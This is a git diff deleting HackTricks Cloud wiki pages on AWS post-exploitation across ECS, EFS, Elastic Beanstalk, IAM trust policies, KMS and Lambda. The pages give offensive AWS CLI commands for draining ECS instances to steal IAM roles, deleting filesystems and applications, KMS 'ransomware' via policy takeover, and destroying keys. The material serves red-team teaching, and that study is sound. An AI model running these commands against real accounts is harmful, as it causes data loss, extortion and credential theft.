-{% endhint %} - -## Control Tower - -{% content-ref url="../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md" %} -[aws-control-tower-enum.md](../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) -{% endcontent-ref %} - -### Enable / Disable Controls - -To further exploit an account, you might need to disable/enable Control Tower controls: - -{% code overflow="wrap" %} -```bash -aws controltower disable-control --control-identifier --target-identifier -aws controltower enable-control --control-identifier --target-identifier -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md deleted file mode 100644 index 51e033417..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - Malicious VPC Mirror - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** - -Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. - -To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. - -The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. - -For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md deleted file mode 100644 index 096bdaea6..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md +++ /dev/null @@ -1,88 +0,0 @@ -# AWS - ECS Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECS - -For more information check: - -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} - -### Host IAM Roles - -In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\ -Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -{% hint style="danger" %} -Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance. -{% endhint %} - -### Privesc to node to steal other containers creds & secrets - -But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached. - -#### Making containers run in current host - -Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container. - -```bash -aws ecs update-container-instances-state \ - --cluster --status DRAINING --container-instances -``` - -The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:** - -```bash -aws ecs deregister-container-instance \ - --cluster --container-instance --force -``` - -A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this: - -```bash -# Needs: ecs:SubmitTaskStateChange -aws ecs submit-task-state-change --cluster \ - --status STOPPED --reason "anything" --containers [...] - -# Needs: ecs:SubmitContainerStateChange -aws ecs submit-container-state-change ... - -# Needs: ecs:SubmitAttachmentStateChanges -aws ecs submit-attachment-state-changes ... -``` - -### Steal sensitive info from ECR containers - -The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md deleted file mode 100644 index 1a78c9dd2..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - EFS Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EFS - -For more information check: - -{% content-ref url="../aws-services/aws-efs-enum.md" %} -[aws-efs-enum.md](../aws-services/aws-efs-enum.md) -{% endcontent-ref %} - -### `elasticfilesystem:DeleteMountTarget` - -An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target. - -```sql -aws efs delete-mount-target --mount-target-id -``` - -**Potential Impact**: Disruption of file system access and potential data loss for users or applications. - -### `elasticfilesystem:DeleteFileSystem` - -An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system. - -```perl -aws efs delete-file-system --file-system-id -``` - -**Potential Impact**: Data loss and service disruption for applications using the deleted file system. - -### `elasticfilesystem:UpdateFileSystem` - -An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion. - -```sql -aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps -``` - -**Potential Impact**: Degradation of file system performance or resource exhaustion. - -### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint` - -An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system. - -```arduino -aws efs create-access-point --file-system-id --posix-user --root-directory -aws efs delete-access-point --access-point-id -``` - -**Potential Impact**: Unauthorized access to the file system, data exposure or modification. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md deleted file mode 100644 index 4856870bc..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md +++ /dev/null @@ -1,121 +0,0 @@ -# AWS - Elastic Beanstalk Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Elastic Beanstalk - -For more information: - -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} - -### `elasticbeanstalk:DeleteApplicationVersion` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version -``` -{% endcode %} - -**Potential Impact**: Disruption of application deployment and potential loss of application versions. - -### `elasticbeanstalk:TerminateEnvironment` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk terminate-environment --environment-name my-existing-env -``` -{% endcode %} - -**Potential Impact**: Downtime of the application, potential data loss, and disruption of services. - -### `elasticbeanstalk:DeleteApplication` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force -``` -{% endcode %} - -**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. - -### `elasticbeanstalk:SwapEnvironmentCNAMEs` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 -``` -{% endcode %} - -**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. - -### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 - -aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag -``` -{% endcode %} - -**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md deleted file mode 100644 index 7a73ed2bd..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md +++ /dev/null @@ -1,130 +0,0 @@ -# AWS - IAM Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -For more information about IAM access: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -## Confused Deputy Problem - -If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. - -Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. - -
- -However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. - -Example: - -```json -{ - "Version": "2012-10-17", - "Statement": { - "Effect": "Allow", - "Principal": { - "AWS": "Example Corp's AWS Account ID" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "12345" - } - } - } -} -``` - -{% hint style="warning" %} -For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. -{% endhint %} - -### Unexpected Trusts - -#### Wildcard as principal - -```json -{ - "Action": "sts:AssumeRole", - "Effect": "Allow", - "Principal": { "AWS": "*" }, -} -``` - -This policy **allows all AWS** to assume the role. - -#### Service as principal - -```json -{ - "Action": "lambda:InvokeFunction", - "Effect": "Allow", - "Principal": { "Service": "apigateway.amazonaws.com" }, - "Resource": "arn:aws:lambda:000000000000:function:foo" -} -``` - -This policy **allows any account** to configure their apigateway to call this Lambda. - -#### S3 as principal - -```json -"Condition": { -"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, - "StringEquals": { - "aws:SourceAccount": "123456789012" - } -} -``` - -If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. - -#### Not supported - -```json -{ - "Effect": "Allow", - "Principal": {"Service": "cloudtrail.amazonaws.com"}, - "Action": "s3:PutObject", - "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" -} -``` - -A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). - -## References - -* [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md deleted file mode 100644 index 18859e4f3..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md +++ /dev/null @@ -1,163 +0,0 @@ -# AWS - KMS Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For more information check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### Encrypt/Decrypt information - -`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: - -* `fileb://:` Reads the file in binary mode, commonly used for non-text files. -* `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. - -{% hint style="success" %} -Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) -{% endhint %} - -* Using a **symmetric** key - -```bash -# Encrypt data -aws kms encrypt \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile - -# Decrypt data -aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --output text \ - --query Plaintext | base64 \ - --decode -``` - -* Using a **asymmetric** key: - -```bash -# Encrypt data -aws kms encrypt \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile - -# Decrypt data -aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --output text \ - --query Plaintext | base64 \ - --decode -``` - -### KMS Ransomware - -An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. - -Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. - -{% hint style="warning" %} -Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. - -Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). -{% endhint %} - -```bash -# Force policy change -aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ - --policy-name default \ - --policy file:///tmp/policy.yaml \ - --bypass-policy-lockout-safety-check - -{ - "Id": "key-consolepolicy-3", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - } - ] -} -``` - -{% hint style="danger" %} -Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. -{% endhint %} - -
- -### Generic KMS Ransomware - -#### Global KMS Ransomware - -There is another way to perform a global KMS Ransomware, which would involve the following steps: - -* Create a new **key with a key material** imported by the attacker -* **Re-encrypt older data** encrypted with the previous version with the new one. -* **Delete the KMS key** -* Now only the attacker, who has the original key material could be able to decrypt the encrypted data - -### Destroy keys - -```bash -# Destoy they key material previously imported making the key useless -aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab - -# Schedule the destoy of a key (min wait time is 7 days) -aws kms schedule-key-deletion \ - --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ - --pending-window-in-days 7 -``` - -{% hint style="danger" %} -Note that AWS now **prevents the previous actions from being performed from a cross account:** -{% endhint %} - -
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md deleted file mode 100644 index f7bea8e86..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md +++ /dev/null @@ -1,55 +0,0 @@ -# AWS - Lambda Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda - -For more information check: - -{% content-ref url="../../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} - -### Steal Others Lambda URL Requests - -If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. - -{% content-ref url="aws-warm-lambda-persistence.md" %} -[aws-warm-lambda-persistence.md](aws-warm-lambda-persistence.md) -{% endcontent-ref %} - -### Steal Others Lambda URL Requests & Extensions Requests - -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. - -{% content-ref url="../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md" %} -[aws-abusing-lambda-extensions.md](../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
